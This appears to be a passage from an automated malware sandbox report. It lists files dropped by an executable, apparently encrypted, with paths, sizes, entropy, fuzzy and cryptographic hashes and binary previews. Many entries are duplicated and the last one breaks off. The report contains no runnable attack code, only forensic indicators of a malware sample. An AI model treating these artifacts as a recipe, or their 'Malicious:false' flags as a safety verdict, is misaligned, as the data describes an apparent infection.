              Preview:QFAPO.1.xb:2g1Vy^5.o...X.\.S......p.c...ycZ..+......r.....).......k.f..^wQ....M.:...>....s..x..%..Sy.z..!."$-1~...2~SvT..x.^.-:S7...l..8.@.SQ..d..).+.g......:.N.6..jq"u.-4...L..i,.~1..,.L.$v..........A..0..A....6...x..r.o..<....H..J..I.@q..%0/&..x9X.0....)....:......Q.p............W.!.3..._.P.Na....d...&..m.Kh{..X.t.c..k.y[hQ..b9..........~L=m..Q.mD4NX.K.9.....T.E. L..._^.c...4.=.z..=.tH.e.b..#...=.E.......].YA>8..3.]...cei\..L0]..c..^"~z.xP.6....V.....0..f....^b....#.....j.v.+.-.....V_F.j...Pjn.O..%....!..i..j...X.L.iz..-...I$.*.."]].]_.Cc..Z.G2.I.i4.%,.X......I.S.~.S.r....~.....I..Ekc...WDt........t#0..QLu..g.m.I.............aD.kj.:..0]f....g_=...a..f.!F..jS..M.[..3.@s.x0...U.....J^~... ...#.?.j.2.l...9~..|.+i;r.2...0O.\:.......j..P....`....y.}3..p..a.........O,[.D;..q.2....fIX...=...Y.b.n.l$yF....Yy........}f./...3.j...a.x.q.M..|.".....x.^,*29....._=qF...%.Y~./..#.J..R.$g..?]..Fl.fSm..;=...}.&.r...E.....U.0.O].b..^....;... 9Y....
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.836780672714415
              Encrypted:false
              SSDEEP:24:rjf+N0otHiIa631wAtv0KdYTLYY6nrZOcGrsWeE58zWkoegsuWAvZ29e6PbD:/f+NbOE1lFdYTLmrZaoaeL9RYMIiD
              MD5:325E6D0085C315158586B41D8CDD0E32
              SHA1:FB55B8A9AFB8FA45499210129632807C18F5BE06
              SHA-256:C105D58BAFA8EE06908626B1FE99D0C83288B827F50CAD0C569E50DAFE4ADC6C
              SHA-512:2559903484B9C6358F000B21FFB5425FE85D5FC4B7A9E1485724CD15AEBB872095D4540C1F9CA7D62E1E3AE73EE2064762A9F48FC4C92E6C4405C2061852FB4C
              Malicious:false
              Preview:QFAPO.1.xb:2g1Vy^5.o...X.\.S......p.c...ycZ..+......r.....).......k.f..^wQ....M.:...>....s..x..%..Sy.z..!."$-1~...2~SvT..x.^.-:S7...l..8.@.SQ..d..).+.g......:.N.6..jq"u.-4...L..i,.~1..,.L.$v..........A..0..A....6...x..r.o..<....H..J..I.@q..%0/&..x9X.0....)....:......Q.p............W.!.3..._.P.Na....d...&..m.Kh{..X.t.c..k.y[hQ..b9..........~L=m..Q.mD4NX.K.9.....T.E. L..._^.c...4.=.z..=.tH.e.b..#...=.E.......].YA>8..3.]...cei\..L0]..c..^"~z.xP.6....V.....0..f....^b....#.....j.v.+.-.....V_F.j...Pjn.O..%....!..i..j...X.L.iz..-...I$.*.."]].]_.Cc..Z.G2.I.i4.%,.X......I.S.~.S.r....~.....I..Ekc...WDt........t#0..QLu..g.m.I.............aD.kj.:..0]f....g_=...a..f.!F..jS..M.[..3.@s.x0...U.....J^~... ...#.?.j.2.l...9~..|.+i;r.2...0O.\:.......j..P....`....y.}3..p..a.........O,[.D;..q.2....fIX...=...Y.b.n.l$yF....Yy........}f./...3.j...a.x.q.M..|.".....x.^,*29....._=qF...%.Y~./..#.J..R.$g..?]..Fl.fSm..;=...}.&.r...E.....U.0.O].b..^....;... 9Y....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.856857623935782
              Encrypted:false
              SSDEEP:24:mzmGinfdlk57VgYFFJLathHydMgcVKLY7WnxdX5UO3XfFUVb3hbrRSCBw/D8SraM:mzfinl2WYFF3do8LYiqOHf0hZf0zD
              MD5:FB670BDC3F2B6F10CC5216A843ACA627
              SHA1:7CC99F83E900B96040B1FE0218061D08D76A8197
              SHA-256:D06DAA446D5316C5056298795B9AFB9AF6A7255A9244DB234049EC7DC6CAB84E
              SHA-512:8EC3C44B78B71DC53B6B2CD7C0F868BB8EC0D7FFB623203A54494FEA8C966D821D4DE63C6566339E79737160850D588CDCDB879AA953474EC3AFF64E152F1890
              Malicious:false
              Preview:UNKRL...\rWQ$.ES..6f\vR_...T..?...RW..h.{...9.m.O.q.jG...r.......w.N .y..A<'..(=...N...f..&....)?..=...AZ.]...A`.@.6..D...LI.i.... ..4...). 1..{B..G..<#..I...q.0.>..\......G9_....0...$Gt>....+6R,fs.E.!Yg...R3.$.b..x.6"....Iu+..v..#.s..eP..b"..;Q|...".<<....F<..........Y#.......8P..#..s&I....D.....TS?...a...X...^......A$.......:......,[..G...3y..y}......KL.5.B..5A.x.....\.f.".........D..b....mn....w...n"fU......}.%~...QmaGy..Vf.)-+..>..u...}.....e...B..n....k..-....8.8$5.>...|.J.R...@.\.z.`b....0.-.N.K..F...j.7....(..S...n.V....$=..NZU.9.R-...$..\.3.....1.`x.E.$.W........_..J..o...~r.Dc..x[.|....g2... .6....]+>....W..i.k../........L.2..#...Og.M.==."...*...\....x........&0...<Qjkd..s.......a.K.b....y.WI_K..Z..Ol_..1..mf...w......].=..Qy./.............p.G...IRi.B...S.q...N......m.t$.'....^Q+C.V....e.8}....Di(..o....\.....M.Dg..[......Z4y.1.ZEc~.u9W...Y.m.s..f.3.QJ.......V.[.*s..J.....)..>...|......:.a..DkT2.z...........'~K.y.W}.i.i.?.y2r.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.856857623935782
              Encrypted:false
              SSDEEP:24:mzmGinfdlk57VgYFFJLathHydMgcVKLY7WnxdX5UO3XfFUVb3hbrRSCBw/D8SraM:mzfinl2WYFF3do8LYiqOHf0hZf0zD
              MD5:FB670BDC3F2B6F10CC5216A843ACA627
              SHA1:7CC99F83E900B96040B1FE0218061D08D76A8197
              SHA-256:D06DAA446D5316C5056298795B9AFB9AF6A7255A9244DB234049EC7DC6CAB84E
              SHA-512:8EC3C44B78B71DC53B6B2CD7C0F868BB8EC0D7FFB623203A54494FEA8C966D821D4DE63C6566339E79737160850D588CDCDB879AA953474EC3AFF64E152F1890
              Malicious:false
              Preview:UNKRL...\rWQ$.ES..6f\vR_...T..?...RW..h.{...9.m.O.q.jG...r.......w.N .y..A<'..(=...N...f..&....)?..=...AZ.]...A`.@.6..D...LI.i.... ..4...). 1..{B..G..<#..I...q.0.>..\......G9_....0...$Gt>....+6R,fs.E.!Yg...R3.$.b..x.6"....Iu+..v..#.s..eP..b"..;Q|...".<<....F<..........Y#.......8P..#..s&I....D.....TS?...a...X...^......A$.......:......,[..G...3y..y}......KL.5.B..5A.x.....\.f.".........D..b....mn....w...n"fU......}.%~...QmaGy..Vf.)-+..>..u...}.....e...B..n....k..-....8.8$5.>...|.J.R...@.\.z.`b....0.-.N.K..F...j.7....(..S...n.V....$=..NZU.9.R-...$..\.3.....1.`x.E.$.W........_..J..o...~r.Dc..x[.|....g2... .6....]+>....W..i.k../........L.2..#...Og.M.==."...*...\....x........&0...<Qjkd..s.......a.K.b....y.WI_K..Z..Ol_..1..mf...w......].=..Qy./.............p.G...IRi.B...S.q...N......m.t$.'....^Q+C.V....e.8}....Di(..o....\.....M.Dg..[......Z4y.1.ZEc~.u9W...Y.m.s..f.3.QJ.......V.[.*s..J.....)..>...|......:.a..DkT2.z...........'~K.y.W}.i.i.?.y2r.
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.828830341266468
              Encrypted:false
              SSDEEP:24:BdDyefgBPdMIx+Yxr/h9VyIn75Gpn1n8+tg7bD:BduTxr/xyoM118AUD
              MD5:A4600F703061E56E89FDE699EB241731
              SHA1:CE26F9D8488C6EAECA6156BC438D7946DA66A8FC
              SHA-256:91156DDD9FE1AD358E88BD9C1D39F99C18D4F746E3437EA4A563A8F5A08BB203
              SHA-512:97BF664BA609DEC95EBCC0AD241F824520868526DC5A8AD134530647071648903F700769E88735D7BC413DD1F89A6C322A5C191B2C149BC60285E62CBEF4BDFA
              Malicious:false
              Preview:VWDFP9"..a.....|b..ubCAD.!qF)4,Q&@.~...o..M..1}IxV..B..r.`...j0H...SB..Km\.jf}..s..i.L....a..3i..PZ....2}.;.......9.R|8..;.@.b;.k..Ux#&..`.WR.c'........C.L..Z.>.t.......\.j9b+.x..,0..05..-k....1$...g...7r.:.u;Y....B.d.-..D8..vv9..@5%......@...9.....l...>k......."..X..x.....?.._.}.z]N.W.~..%....H.........t)..].!.x..8.,...p..f.+.E..(^.fo..C..W.%ZO.y....Z.......}..z.XQ........).G.P.e...c.&0.p.L...`.....).-&...B...X....xD.a...y...&.....T....f.b..........I....ip.`..~2...n%..4:...._W..p-.$....=..;R...S...@...rc...H.]`.}.4>.M.E..>.9!{........f9.a....`}........-..ck.z.fX..6..#..&..}.......RS...,..4B...............I.....z........C.......7.#.|..tF;*.'z....*P.....E..]..RZ..=I. K.&'..............6w.....;.|..r.......b....t..*k..ewm...fQ!..SU8IPB..Z....,.?>...o...../.........W./....W.....D..yZ.i*i5k.l......H^z.C./.%8....j.=.7.>."L#e..D..:&...B...z"....N.bE.Lv..6....l).....G..N.._c...k..TU......Z...d.h..VA......1U...&.O4.NP.X.B..oq.*....m.<.V.
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.828830341266468
              Encrypted:false
              SSDEEP:24:BdDyefgBPdMIx+Yxr/h9VyIn75Gpn1n8+tg7bD:BduTxr/xyoM118AUD
              MD5:A4600F703061E56E89FDE699EB241731
              SHA1:CE26F9D8488C6EAECA6156BC438D7946DA66A8FC
              SHA-256:91156DDD9FE1AD358E88BD9C1D39F99C18D4F746E3437EA4A563A8F5A08BB203
              SHA-512:97BF664BA609DEC95EBCC0AD241F824520868526DC5A8AD134530647071648903F700769E88735D7BC413DD1F89A6C322A5C191B2C149BC60285E62CBEF4BDFA
              Malicious:false
              Preview:VWDFP9"..a.....|b..ubCAD.!qF)4,Q&@.~...o..M..1}IxV..B..r.`...j0H...SB..Km\.jf}..s..i.L....a..3i..PZ....2}.;.......9.R|8..;.@.b;.k..Ux#&..`.WR.c'........C.L..Z.>.t.......\.j9b+.x..,0..05..-k....1$...g...7r.:.u;Y....B.d.-..D8..vv9..@5%......@...9.....l...>k......."..X..x.....?.._.}.z]N.W.~..%....H.........t)..].!.x..8.,...p..f.+.E..(^.fo..C..W.%ZO.y....Z.......}..z.XQ........).G.P.e...c.&0.p.L...`.....).-&...B...X....xD.a...y...&.....T....f.b..........I....ip.`..~2...n%..4:...._W..p-.$....=..;R...S...@...rc...H.]`.}.4>.M.E..>.9!{........f9.a....`}........-..ck.z.fX..6..#..&..}.......RS...,..4B...............I.....z........C.......7.#.|..tF;*.'z....*P.....E..]..RZ..=I. K.&'..............6w.....;.|..r.......b....t..*k..ewm...fQ!..SU8IPB..Z....,.?>...o...../.........W./....W.....D..yZ.i*i5k.l......H^z.C./.%8....j.=.7.>."L#e..D..:&...B...z"....N.bE.Lv..6....l).....G..N.._c...k..TU......Z...d.h..VA......1U...&.O4.NP.X.B..oq.*....m.<.V.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.842877584219066
              Encrypted:false
              SSDEEP:24:/wU7GS8/SUeZy11qzHM8FNQ6gOEdXOYK8IozVLKUk5zBkPFPbD:1UeZyLqzHM8/Q6gJOYKkVrk5iBD
              MD5:A11E22FF02DF5F9BBDC6777DBE5A0D73
              SHA1:F492329B0185E359CF6B2BCD1F467DBD616ADEFE
              SHA-256:C9F1D933B7B846CD2C0DDCB812DEB7BBA122E0FB85ED0743E42CE53011B47F81
              SHA-512:72A82126C1ED278E6A86F692D6CC86C2DD46E7FF989FE7666A52013F310CBE7A70D4386B8D56EEC4D598A4BE82D4B892F0591C2A606EF8DCEECF4D6FBF23222B
              Malicious:false
              Preview:ZIPXY......|..u..j.r|v...7d.....{.A .0.(. 'T5I{Kn-....p(j.*.:.Mvt...f...).tU.j.J|"`.h...2..|).D....N.....(...5O.w....T...>as..a,S..7..7.*.e..?...*/....V..z.]..7H......G......K.~V.,..7.P. R.......T......'...."D....C...... o>..#.\._......YjEf.clW.O.N..g..d.8.......?.i....o...wq'..]h;6..d^.D.`/0...-B....(..a0...+..m.._..K)vrt.,.J_0.......M.v..m.g..5..$..9.Y.D.........x.W@6E...}.\%..~3.H...=^x.6j..&.Yso.Y....w%_v!..=.>....:8?yZ...k8\.....d..%.q~....Q.X%R8 q.....T2.W..k22...+%..<.P..gBY].^.........8.....M.&.Qe.L;.p7|U[0.v..G.j.9"....$.....:..8...%}.7.H.?%[._...\....!...H....C..s...VO.z.-..-.^.Y2.(*..W.'f.'hnKt.o.G..+.q.._..so.g.$.1.q.3.....3.bUR).G$.g.7.5.B..{t...0...H..... .%.....Q....aO}~.$.. 6.oZ....A..*....j.6`...a..S..=.:.|yw.?.F.....%...Z..>t....3^..._..Um..S......T.R0uGzn....N-.c....fz..OOh.U,...j....V.0U.}.v.8<.ob.LI.$uza..T`J.*(xh.7. .g..U8z.W...c.....e....R.....%..:.n...=]..l'....D....(.;;.""e..qN....j....0.VB.q.....9.\.^L.M}.q..M/
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1360
              Entropy (8bit):7.842877584219066
              Encrypted:false
              SSDEEP:24:/wU7GS8/SUeZy11qzHM8FNQ6gOEdXOYK8IozVLKUk5zBkPFPbD:1UeZyLqzHM8/Q6gJOYKkVrk5iBD
              MD5:A11E22FF02DF5F9BBDC6777DBE5A0D73
              SHA1:F492329B0185E359CF6B2BCD1F467DBD616ADEFE
              SHA-256:C9F1D933B7B846CD2C0DDCB812DEB7BBA122E0FB85ED0743E42CE53011B47F81
              SHA-512:72A82126C1ED278E6A86F692D6CC86C2DD46E7FF989FE7666A52013F310CBE7A70D4386B8D56EEC4D598A4BE82D4B892F0591C2A606EF8DCEECF4D6FBF23222B
              Malicious:false
              Preview:ZIPXY......|..u..j.r|v...7d.....{.A .0.(. 'T5I{Kn-....p(j.*.:.Mvt...f...).tU.j.J|"`.h...2..|).D....N.....(...5O.w....T...>as..a,S..7..7.*.e..?...*/....V..z.]..7H......G......K.~V.,..7.P. R.......T......'...."D....C...... o>..#.\._......YjEf.clW.O.N..g..d.8.......?.i....o...wq'..]h;6..d^.D.`/0...-B....(..a0...+..m.._..K)vrt.,.J_0.......M.v..m.g..5..$..9.Y.D.........x.W@6E...}.\%..~3.H...=^x.6j..&.Yso.Y....w%_v!..=.>....:8?yZ...k8\.....d..%.q~....Q.X%R8 q.....T2.W..k22...+%..<.P..gBY].^.........8.....M.&.Qe.L;.p7|U[0.v..G.j.9"....$.....:..8...%}.7.H.?%[._...\....!...H....C..s...VO.z.-..-.^.Y2.(*..W.'f.'hnKt.o.G..+.q.._..so.g.$.1.q.3.....3.bUR).G$.g.7.5.B..{t...0...H..... .%.....Q....aO}~.$.. 6.oZ....A..*....j.6`...a..S..=.:.|yw.?.F.....%...Z..>t....3^..._..Um..S......T.R0uGzn....N-.c....fz..OOh.U,...j....V.0U.}.v.8<.ob.LI.$uza..T`J.*(xh.7. .g..U8z.W...c.....e....R.....%..:.n...=]..l'....D....(.;;.""e..qN....j....0.VB.q.....9.\.^L.M}.q..M/
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):445
              Entropy (8bit):7.395265250928519
              Encrypted:false
              SSDEEP:12:EmUQ1Bu8iXjLbX4JKMtZNe0wUn13PqzRYukIcii9a:D1oLbXkEdE1y9bD
              MD5:27B69AFBF341D4FE5C5937A066023F3B
              SHA1:CB0B22C77E8882EFC184B3C9A518382D862D091E
              SHA-256:413A5E856614EC4D24A0777E66ED311571AFB9BBB1E1961170FF94028A4DD964
              SHA-512:CD10A3AFD9D6D6D95545D3A7B4397D77A687602D1BBC8A3A676CD9F85558167AAF2E673E02A6700D68C100EA8651CE94013CAA57CE957C4BEC047C4C4EBD6BFB
              Malicious:false
              Preview:[{000y.l-...=g.....tk.....J.+..'.....M+6F$.s...Z.J>.b..ig...m.AB........v9.......X..V.......c...|..7.\,.....Q....s.......H...A. .!..y.>N.=..,.du..w.W.F....r.t9.U;..,.Oc.].F-=.._.......klo.ZF.....+.9[<..1..3....qU.9>5`....m...1.L..X.c...e;|....^S..W...4..H.|.M...).}Hc.IZ.H.....>O......Ow......W.x1..xs......<.:.r?.h....2...].+ge..{....5....,#...C..ttp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):445
              Entropy (8bit):7.395265250928519
              Encrypted:false
              SSDEEP:12:EmUQ1Bu8iXjLbX4JKMtZNe0wUn13PqzRYukIcii9a:D1oLbXkEdE1y9bD
              MD5:27B69AFBF341D4FE5C5937A066023F3B
              SHA1:CB0B22C77E8882EFC184B3C9A518382D862D091E
              SHA-256:413A5E856614EC4D24A0777E66ED311571AFB9BBB1E1961170FF94028A4DD964
              SHA-512:CD10A3AFD9D6D6D95545D3A7B4397D77A687602D1BBC8A3A676CD9F85558167AAF2E673E02A6700D68C100EA8651CE94013CAA57CE957C4BEC047C4C4EBD6BFB
              Malicious:false
              Preview:[{000y.l-...=g.....tk.....J.+..'.....M+6F$.s...Z.J>.b..ig...m.AB........v9.......X..V.......c...|..7.\,.....Q....s.......H...A. .!..y.>N.=..,.du..w.W.F....r.t9.U;..,.Oc.].F-=.._.......klo.ZF.....+.9[<..1..3....qU.9>5`....m...1.L..X.c...e;|....^S..W...4..H.|.M...).}Hc.IZ.H.....>O......Ow......W.x1..xs......<.:.r?.h....2...].+ge..{....5....,#...C..ttp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):542
              Entropy (8bit):7.514928513579481
              Encrypted:false
              SSDEEP:12:YLCNrCivJqSDPW6AB2fA6MXNlQ+KEWf15nDw+nukIcii9a:vrFJqSDPW6ABv6MXNpQ8+MbD
              MD5:7C2D0BC1A317E7FB7FB92C2EED338BB0
              SHA1:90C7154F75DC664B4D31E69CB62CBB25EBA11A48
              SHA-256:BC30D2EECA44A7296492BA2D5A21B4B1BF5B3E5328BFF0EA6E6EB60B15C3E0FC
              SHA-512:51A83DC645224B40D468AD2D598E0C5A05E0804E563799DC5EEF0CC1DFE376B0BEC7F7C04DB3C69690FF15F778C9FBCB994864F359A542073A810D25D57919A7
              Malicious:false
              Preview:[{000V.=.,.td....t..{=V`/......,._.f.&...Bwh..C*...c.@'~...G...SSo.4.......{<.%m....&#W>^>~......u...F(.............FY.:y.4...AT......4.8-."..,.z5r..B..l.>.... ...e..;...$.;.(.N>.`.W)6o....I\....D7W...@D.#e.0.X8.2.T"....h.)j.o.'.h.(....v{.h.=T.......z)...;n.a....u..;.3.X....2.#.E.sj..4}.Sx.p..4.}...q.=.qd...^.....+.z...a..,..f.....V..^.(V....."u......_...s...g.7..J..........P...u....K..5...e.O.LT....k.AN)PBQo8..t.]i.....Z~z..q.>.D.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):542
              Entropy (8bit):7.514928513579481
              Encrypted:false
              SSDEEP:12:YLCNrCivJqSDPW6AB2fA6MXNlQ+KEWf15nDw+nukIcii9a:vrFJqSDPW6ABv6MXNpQ8+MbD
              MD5:7C2D0BC1A317E7FB7FB92C2EED338BB0
              SHA1:90C7154F75DC664B4D31E69CB62CBB25EBA11A48
              SHA-256:BC30D2EECA44A7296492BA2D5A21B4B1BF5B3E5328BFF0EA6E6EB60B15C3E0FC
              SHA-512:51A83DC645224B40D468AD2D598E0C5A05E0804E563799DC5EEF0CC1DFE376B0BEC7F7C04DB3C69690FF15F778C9FBCB994864F359A542073A810D25D57919A7
              Malicious:false
              Preview:[{000V.=.,.td....t..{=V`/......,._.f.&...Bwh..C*...c.@'~...G...SSo.4.......{<.%m....&#W>^>~......u...F(.............FY.:y.4...AT......4.8-."..,.z5r..B..l.>.... ...e..;...$.;.(.N>.`.W)6o....I\....D7W...@D.#e.0.X8.2.T"....h.)j.o.'.h.(....v{.h.=T.......z)...;n.a....u..;.3.X....2.#.E.sj..4}.Sx.p..4.}...q.=.qd...^.....+.z...a..,..f.....V..^.(V....."u......_...s...g.7..J..........P...u....K..5...e.O.LT....k.AN)PBQo8..t.]i.....Z~z..q.>.D.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):447
              Entropy (8bit):7.443574082090486
              Encrypted:false
              SSDEEP:12:1xmlj5h7WsKx8jnQhDo80bZ8LwHrAnukIcii9a:1UtT71EOQFZ0F7LJbD
              MD5:407576590AEB06FC53C7AE4586EFC23D
              SHA1:A527F2D6CD36723D16C354C43B5B1871A7966A07
              SHA-256:6A0AFF1787FD8881EB83101B5B5E2B677CBE79911163040F53C85920CD657D02
              SHA-512:6885CF5ACB53BF7C1B371315C86610CB47AEE48AC34806B7A1181E24CE64D48532CEDE79F569A9BE4EE383B8691BA764B8CFED0F3BA4D22E4ED20E6BA2662E60
              Malicious:false
              Preview:[{0007..^.....y.Z.....8h...D.GS.........s../.l#.sm...oj.G..Q.~+..?x>.<.u#.yK...<.R.1o!...t.y.;.......V .*lH6.4.(....C...t...MJp...I9E.!.*...b..m....3 j.........^.......@.h.=...-....6...2.."0.p.k........a...L9.#m..dX..,!...Ma.=.MtT..#....n/\..........J...~.....3......q%...fP.{4..c.4......>x1=...F.U.g.@2F"Z.$..u.>...Q.TOb..T69.\.IoT...U.$..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):447
              Entropy (8bit):7.443574082090486
              Encrypted:false
              SSDEEP:12:1xmlj5h7WsKx8jnQhDo80bZ8LwHrAnukIcii9a:1UtT71EOQFZ0F7LJbD
              MD5:407576590AEB06FC53C7AE4586EFC23D
              SHA1:A527F2D6CD36723D16C354C43B5B1871A7966A07
              SHA-256:6A0AFF1787FD8881EB83101B5B5E2B677CBE79911163040F53C85920CD657D02
              SHA-512:6885CF5ACB53BF7C1B371315C86610CB47AEE48AC34806B7A1181E24CE64D48532CEDE79F569A9BE4EE383B8691BA764B8CFED0F3BA4D22E4ED20E6BA2662E60
              Malicious:false
              Preview:[{0007..^.....y.Z.....8h...D.GS.........s../.l#.sm...oj.G..Q.~+..?x>.<.u#.yK...<.R.1o!...t.y.;.......V .*lH6.4.(....C...t...MJp...I9E.!.*...b..m....3 j.........^.......@.h.=...-....6...2.."0.p.k........a...L9.#m..dX..,!...Ma.=.MtT..#....n/\..........J...~.....3......q%...fP.{4..c.4......>x1=...F.U.g.@2F"Z.$..u.>...Q.TOb..T69.\.IoT...U.$..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):445
              Entropy (8bit):7.430285046266657
              Encrypted:false
              SSDEEP:12:Zk+gyqEu3chy9KxwxO4qdfVS8CzG8PukIcii9a:ZD4g2Kx0O4yfoXz7UbD
              MD5:3F57EA1D2DE4C8BFFD5D85B151C01AD4
              SHA1:58732B1FC293035B81A7A5D58DACB0895991B0AB
              SHA-256:2681C443452C8AB423D3B7D649A601D1A3DBAC3FCD985A77D77887063ECDDD28
              SHA-512:E561AC04016A392776D511642413BB491AC08A2733FC1BDC1EBDF84A81BF46D8A621D680AFB7FCFC5CE66BAAFBCE040695C171B943C8543E684D036CF1FFEF03
              Malicious:false
              Preview:[{000....@.<t.6.h..........7o..I.a>.2...<R..A....($G.....J...q2...Qs./[ ...@..*q.)../.z{.......r.N..\.Z.c..3?y.".[..{...L..c....'.r.y.7^.....K...nk.F..2.....]...>}...c.@....S.p."..zs./i.s......Tb..<...d. v.../c..H.P.6.,Z.......n..H..^*0..yC.pv.g^..e.H 5......k....p..}.....m.X.E..... x...s..R.].Fb.'..q<&.......T1i.Z&E..u.j...l.B2..a`.)HdG (..A,nb.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):445
              Entropy (8bit):7.430285046266657
              Encrypted:false
              SSDEEP:12:Zk+gyqEu3chy9KxwxO4qdfVS8CzG8PukIcii9a:ZD4g2Kx0O4yfoXz7UbD
              MD5:3F57EA1D2DE4C8BFFD5D85B151C01AD4
              SHA1:58732B1FC293035B81A7A5D58DACB0895991B0AB
              SHA-256:2681C443452C8AB423D3B7D649A601D1A3DBAC3FCD985A77D77887063ECDDD28
              SHA-512:E561AC04016A392776D511642413BB491AC08A2733FC1BDC1EBDF84A81BF46D8A621D680AFB7FCFC5CE66BAAFBCE040695C171B943C8543E684D036CF1FFEF03
              Malicious:false
              Preview:[{000....@.<t.6.h..........7o..I.a>.2...<R..A....($G.....J...q2...Qs./[ ...@..*q.)../.z{.......r.N..\.Z.c..3?y.".[..{...L..c....'.r.y.7^.....K...nk.F..2.....]...>}...c.@....S.p."..zs./i.s......Tb..<...d. v.../c..H.P.6.,Z.......n..H..^*0..yC.pv.g^..e.H 5......k....p..}.....m.X.E..... x...s..R.].Fb.'..q<&.......T1i.Z&E..u.j...l.B2..a`.)HdG (..A,nb.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):443
              Entropy (8bit):7.495253537092174
              Encrypted:false
              SSDEEP:12:Zherd0XJZryooCVVugmaYklb6CRKXFMRJE6t3XTukIcii9a:HusJdjVggJblbDRK1Sa6tHgbD
              MD5:9446F0E6A5ADDACF6E470AB60A49C66A
              SHA1:D24381EC1E03E74C3F343CCB160FAEFD76124273
              SHA-256:071B7D9F57E79C1ED1748B35C9AA294C0CC22172F144906F65ED3421715BAFBE
              SHA-512:40F42C8F04E6DEF332590C8356764959D889A39AFF103598BF258A5521038D75B519D2BED5450F1FA16A77372D5F4E3D04981875240E7289D842B381908ADF17
              Malicious:false
              Preview:[{000..u....i....W.V.....t.f'....,.5.K...#!.....Rk:.....5...m.e.....wK...p..&..!'......+.....$.Y[.evTucow........._.....FF..LS..N.....<.M....j.<1...P..! '.M..?8f.8..?...a.'.....3.!.5-.xO/.I.ZW.x.;...F.c.Bc..&.&r.?.".I.I......%,.R.-......gcr?tL....j$..K#.....+k..ByHP@..^......P..4.......J.!..T...D.s-rh..."..s'E.Y...)B..8......eR...K...I...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):443
              Entropy (8bit):7.495253537092174
              Encrypted:false
              SSDEEP:12:Zherd0XJZryooCVVugmaYklb6CRKXFMRJE6t3XTukIcii9a:HusJdjVggJblbDRK1Sa6tHgbD
              MD5:9446F0E6A5ADDACF6E470AB60A49C66A
              SHA1:D24381EC1E03E74C3F343CCB160FAEFD76124273
              SHA-256:071B7D9F57E79C1ED1748B35C9AA294C0CC22172F144906F65ED3421715BAFBE
              SHA-512:40F42C8F04E6DEF332590C8356764959D889A39AFF103598BF258A5521038D75B519D2BED5450F1FA16A77372D5F4E3D04981875240E7289D842B381908ADF17
              Malicious:false
              Preview:[{000..u....i....W.V.....t.f'....,.5.K...#!.....Rk:.....5...m.e.....wK...p..&..!'......+.....$.Y[.evTucow........._.....FF..LS..N.....<.M....j.<1...P..! '.M..?8f.8..?...a.'.....3.!.5-.xO/.I.ZW.x.;...F.c.Bc..&.&r.?.".I.I......%,.R.-......gcr?tL....j$..K#.....+k..ByHP@..^......P..4.......J.!..T...D.s-rh..."..s'E.Y...)B..8......eR...K...I...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):446
              Entropy (8bit):7.429631354214406
              Encrypted:false
